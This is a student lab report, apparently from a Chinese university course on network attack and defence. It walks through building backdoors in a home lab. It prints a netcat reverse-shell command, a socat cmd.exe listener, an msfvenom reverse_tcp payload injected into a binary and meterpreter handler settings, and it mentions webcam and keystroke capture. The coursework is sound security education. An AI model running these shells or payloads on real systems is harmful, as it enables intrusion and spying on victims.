20212302 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212302郎紫轩 2024-04-03 00:59:29

目录

 

一.实验内容

1.本周学习总结

2.实践目标

3.实验要求

4.回答问题

二.实验过程

准备工作:

1.使用netcat获取主机操作Shell,cron启动某项任务

使用netcat 获取kali的shell

 用cron命令启动某项任务

2.kali下使用socat获取windows的Shell, 用schtasks命令创建并启动某项任务计划

准备工作:

 使用socat获取windows的Shell

 用schtasks命令创建并启动某项任务计划

3.使用MSF meterpreter生成后门文件,利用ncat或socat传送到主机并运行,获取主机Shell

4.使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容,并尝试提权

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

三.问题及解决方案

四.学习感悟、思考等

参考资料


 

 

一.实验内容

1.本周学习总结

常见后门位置:   编译器     操作系统   应用程序 (本次实验属于操作系统后门)

后门:后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。

实现后门攻击首先是要有一个后门程序,然后将程序放入目标的操作系统上,然后让其运行起来,还需要不被恶意代码的检测程序发现。后门程序的生成方法很多,在这次试验用meterpreter来生成后门程序;放入目标的系统可以通过诱骗对方下载包含后门的程序,直接用存储设备拷贝到目标上......之后需要让后门程序运行,设置程序自启动,win定时任务,伪装成常用的软件等方法。

 

Metasploit Framework(MSF)是一种开源的渗透测试工具,用于开发和执行安全漏洞利用。其中的Meterpreter是Metasploit Framework中的一个后渗透载荷(payload),旨在提供强大的远程访问功能。Meterpreter具有许多功能,包括文件系统操作、网络操作、系统信息收集等,使渗透测试人员能够在受攻击的系统上执行各种任务。

socat 和 netcat 都是用于网络数据传输的工具,但它们在功能和用法上有一些不同:

Netcat (nc):
功能: Netcat是一个简单的网络工具,用于读写数据,支持TCP和UDP协议。
用法: 常用于端口扫描、端口监听、数据传输等简单的网络操作。

Socat:(双向的加密的数据通道建立)

功能: Socat是一个多功能的网络工具,支持在两个连接之间建立双向数据通信,支持多种协议和功能。
用法: Socat可以用于创建虚拟端口、端口转发、加密通信、代理等复杂的网络操作。

Netcat适用于简单的网络操作,如端口扫描和基本数据传输,而Socat则更加强大,可以执行更复杂的网络任务,如加密通信、端口转发、代理等。选择使用哪个工具取决于您的具体需求和所需功能的复杂性。

 


2.实践目标

(1)使用netcat获取主机操作Shell,cron启动任务

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

3.实验要求

掌握后门原理及免杀技术

4.回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

下载了伪装成合法软件的恶意软件或者经过诱导点击了不明链接

(2)例举你知道的后门如何启动起来(win及linux)的方式?


Win

注册表启动项: 攻击者可以将后门程序添加到Windows注册表的自启动项中,使其在系统启动时自动执行。
服务: 将后门程序安装为系统服务,使其在系统启动时自动运行。

Linux

启动脚本: 在启动时执行的脚本中添加后门程序的启动命令,如/etc/rc.local或/etc/init.d/目录下的脚本。
定时任务: 利用cron定时任务,使后门程序在系统启动时自动执行。
系统服务: 将后门程序作为系统服务安装,并将其配置为在系统启动时自动启动。
SSH后门: 修改SSH配置文件,以允许攻击者在系统启动时远程访问并控制系统。

 

(3)Meterpreter有哪些给你映像深刻的功能?

获取设备权限 例如麦克风 屏幕捕获等 以及允许攻击者在目标系统上执行远程命令,从而执行各种操作,如文件操作、系统配置更改等。

(4)如何发现自己有系统有没有被安装后门?

最方便的方法是借助一些安全查杀工具来进行检测

或者手动检查操作系统中的所有用户信息和权限是否有不明用户

二.实验过程

准备工作:

分别查看主机和虚拟机ip 并尽量整个过程中不要更改

主机:(win)

 

虚拟机:(kali-linux)

 

 

 

1.使用netcat获取主机操作Shell,cron启动某项任务

使用netcat 获取kali的shell

首先需要下载ncat.rar,老师提供的附件中有,下载解压即可。

 为了获取在win上获取linux的shell需要分别执行以下命令

windows:  ncat -l -p 2302[端口号]
linux:   nc 192.168.3.148[windows ip] 2302 -e /bin/sh

 成功获取如下:

 

 用cron命令启动某项任务

本项操作需要root权限,由于我提前授予了root权限因此正常进行

 

任务添加成功

 

 

2.kali下使用socat获取windows的Shell, 用schtasks命令创建并启动某项任务计划

准备工作:

需要把主机的防火墙关闭

 使用socat获取windows的Shell

 

linux:   socat - tcp:[windows ip]:2302[端口号]
windows:  socat.exe tcp-listen:2302 exec:cmd.exe,pty,stderr

随便用一个指令来验证是否连通

 kali成功获取win的shell

 用schtasks命令创建并启动某项任务计划

我写的20212302lzx.exe小程序,会往windowsE盘文件目录下的lzx.txt文件中每隔一分钟写入一个1

然后通过输入schtasks命令来创建任务

schtasks /create /sc minute /mo 1 /tn "lzx" /tr D:\20212302lzx.exe

查看执行情况

 

 

 

 

 

3.使用MSF meterpreter生成后门文件,利用ncat或socat传送到主机并运行,获取主机Shell

在满足root权限下进行且kali和windows的ip地址在同一局域网内,互相能ping通后使用MSF meterpreter生成后门文件

然后我用netcat将后门文件传送到主机

 

 

 进入kali的MSF控制台

保持监听然后在windows上打开后门程序,成功获取shell

至此即可顺利进行下一步操作

4.使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容,并尝试提权

输入help查看具体的渗透指令

键盘抓取:

获取摄像头
meterpreter > webcam_snap

提权

 

 

 

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.26.136 LPORT=2302 -x pwn2302_1 -f elf > 20212302_msf

-p是指定payload的类型,对于Linux系统通过反向TCP连接进行通信
攻击者的 IP 地址=192.168.26.136
监听端口号=2307
-f elf: 指定了生成的 payload 的格式
20212302_msf: 生成的文件名

然后进行以下操作

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
show options
set LHOST 192.168.26.136
set LPORT 2302

然后对文件进行赋权操作然后运行生成的后门文件

至此实验结束



 

三.问题及解决方案

  • 问题1:主机与虚拟机无法ping通
  • 问题1解决方案:参考此链接正确设置虚拟机网络成功解决
  • 问题2虚拟机给windows设置任务时,设置成功并在任务计划清单中找到,但该任务并没有实际执行。  
  • 问题2解决方案:后来发现 对该盘文件进行操作需要管理员权限,因此没有正常执行。授予管理员权限即可。
  • 问题3:在之后实验过程中又不能获取shell
  • 问题3解决方案:后来发现是因为中途换网导致ip改变 检查ip后重新连接即可

四.学习感悟、思考等

  • 感悟与思考:

    通过这次实验我不仅了解后门攻击的原理,还能够掌握一些常见的防御技术,以更好地保护自己的系统。我还学习使用了netcat、socat、meterpreter等工具进行渗透。更加深入了解了网络安全攻击和防御的原理和技术,并对潜在的威胁和风险有了更深入的认识。在解决问题的过程中我也学到了很多。首先,网络设置对于虚拟机和主机之间的通信至关重要。确保网络设置正确,可以确保它们能够互相通信,这是进行虚拟环境实验的前提。其次,操作系统权限管理也是一个关键因素。即使任务在任务计划清单中设置成功,但如果没有足够的权限执行操作,也会导致任务无法正常执行。此外,网络连接的稳定性也是需要注意的。在实验过程中,网络中断或IP地址变更可能会影响到后续操作的执行。尽量选用稳定的网络可以使实验更顺利。解决这些问题需要具备技术实力,同时也需要耐心、细心和灵活应对。每次解决问题都是一次学习和成长的机会,通过不断总结经验和思考,可以提高我自己的问题解决能力和技术水平。总体而言,这次实验不仅增强了我对后门攻击的认知,还让我更加明白了如何有效地防御和检测后门攻击。同时,通过实践,我也对各种工具和技术有了更深入的了解,这对于提高我的网络安全意识和能力具有重要的意义。

参考资料

...全文
67 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验:认识性实验实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图

92

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧